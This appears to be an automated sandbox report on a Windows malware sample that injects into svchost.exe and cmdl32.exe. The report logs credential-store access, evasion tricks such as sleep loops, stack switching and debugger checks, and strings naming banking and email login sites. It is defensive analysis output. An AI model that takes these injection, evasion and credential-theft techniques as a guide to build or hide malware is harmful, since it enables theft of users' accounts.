            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeFile created: C:\Users\user\AppData\Local\Temp\hepatoduodenostomyJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cmdl32.exe, 00000007.00000002.4603396421.0000000002902000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.000000000290C000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2670818362.0000000002902000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.000000000292F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: P030092024LANDWAY.exeVirustotal: Detection: 29%
            Source: P030092024LANDWAY.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeFile read: C:\Users\user\Desktop\P030092024LANDWAY.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\P030092024LANDWAY.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cmpbk32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cmutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: P030092024LANDWAY.exeStatic file information: File size 1054545 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BpYpWzndkWcpUJ.exe, 00000006.00000000.2409444434.000000000084E000.00000002.00000001.01000000.00000005.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4601455514.000000000084E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ABAD push esi; ret 2_2_0040ABBD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ABB3 push esi; ret 2_2_0040ABBD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407477 push eax; iretd 2_2_0040747E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413CE3 push edi; retf 2_2_00413CED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004034F0 push eax; ret 2_2_004034F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415654 push esp; ret 2_2_00415655
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401758 push ecx; retf 2_2_00401766
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_048C09AD push ecx; mov dword ptr [esp], ecx7_2_048C09B6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02718331 push eax; iretd 7_2_0271833B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02718094 push es; iretd 7_2_02718095
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02712161 push esp; ret 7_2_02712162
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027076C0 push esi; ret 7_2_027076CA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027076BA push esi; ret 7_2_027076CA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_027107F0 push edi; retf 7_2_027107FA
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_02703F84 push eax; iretd 7_2_02703F8B
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452D441 push ebx; retf 7_2_0452D442
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452C42B push cs; iretd 7_2_0452C42E
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452561A push edx; ret 7_2_04525624
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452077F push F754C171h; iretd 7_2_04520786
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452C0C8 pushad ; retf 7_2_0452C0C9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_045251D7 push ecx; iretd 7_2_045251D8
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452518E push ecx; ret 7_2_0452518F
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_045252CA pushfd ; ret 7_2_045252CB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04525EE5 push edi; iretd 7_2_04525EEB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452CFB2 push ebx; iretd 7_2_0452CFC4
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0452587F push es; ret 7_2_04525899
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_045258DB pushfd ; iretd 7_2_045258E3
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04524886 push ebp; retf 7_2_04524887
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_04526953 push esi; ret 7_2_04526968
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 9_2_05036E70 push esi; ret 9_2_05036E80
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeAPI/Special instruction interceptor: Address: 416F2B4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD1C0 rdtsc 2_2_038AD1C0
            Source: C:\Windows\SysWOW64\cmdl32.exeWindow / User API: threadDelayed 3556Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeWindow / User API: threadDelayed 6417Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\cmdl32.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032Thread sleep count: 3556 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032Thread sleep time: -7112000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032Thread sleep count: 6417 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exe TID: 1032Thread sleep time: -12834000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224Thread sleep time: -51000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe TID: 3224Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdl32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0271C1A0 FindFirstFileW,FindNextFileW,FindClose,7_2_0271C1A0
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
            Source: 3f75FH48.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 3f75FH48.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 3f75FH48.7.drBinary or memory string: discord.comVMware20,11696487552f
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 3f75FH48.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 3f75FH48.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: BpYpWzndkWcpUJ.exe, 00000009.00000002.4605387236.0000000000C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: 3f75FH48.7.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2781629613.00000181670AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 3f75FH48.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 3f75FH48.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 3f75FH48.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 3f75FH48.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 3f75FH48.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 3f75FH48.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 3f75FH48.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 3f75FH48.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: 3f75FH48.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 3f75FH48.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 3f75FH48.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: cmdl32.exe, 00000007.00000002.4617448289.0000000007A39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169648
            Source: 3f75FH48.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 3f75FH48.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD1C0 rdtsc 2_2_038AD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417653 LdrLoadDll,2_2_00417653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390539D mov eax, dword ptr fs:[00000030h]2_2_0390539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A mov eax, dword ptr fs:[00000030h]2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0388739A mov eax, dword ptr fs:[00000030h]2_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038533A5 mov eax, dword ptr fs:[00000030h]2_2_038533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038633A0 mov eax, dword ptr fs:[00000030h]2_2_038633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038633A0 mov eax, dword ptr fs:[00000030h]2_2_038633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EB3D0 mov ecx, dword ptr fs:[00000030h]2_2_038EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF3E6 mov eax, dword ptr fs:[00000030h]2_2_038EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039053FC mov eax, dword ptr fs:[00000030h]2_2_039053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
